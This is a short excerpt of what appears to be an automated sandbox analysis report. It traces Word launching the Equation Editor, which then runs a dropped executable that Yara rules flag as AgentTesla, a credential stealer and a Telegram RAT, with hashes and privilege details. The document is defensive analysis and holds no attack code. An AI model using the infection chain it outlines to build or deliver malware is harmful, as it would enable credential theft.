                                                                                    Start time:10:35:13
                                                                                    Start date:14/10/2021
                                                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                    Imagebase:0x13f870000
                                                                                    File size:1423704 bytes
                                                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:10:35:15
                                                                                    Start date:14/10/2021
                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                    Imagebase:0x400000
                                                                                    File size:543304 bytes
                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:10:35:17
                                                                                    Start date:14/10/2021
                                                                                    Path:C:\Users\user\AppData\Roaming\godsawqop.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Roaming\godsawqop.exe
                                                                                    Imagebase:0x340000
                                                                                    File size:486912 bytes
                                                                                    MD5 hash:D1BAA9515F4C67A7B561938BBD81BC75
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:10:35:41
                                                                                    Start date:14/10/2021
                                                                                    Path:C:\Users\user\AppData\Roaming\godsawqop.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Roaming\godsawqop.exe
                                                                                    Imagebase:0x340000
                                                                                    File size:486912 bytes
                                                                                    MD5 hash:D1BAA9515F4C67A7B561938BBD81BC75
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >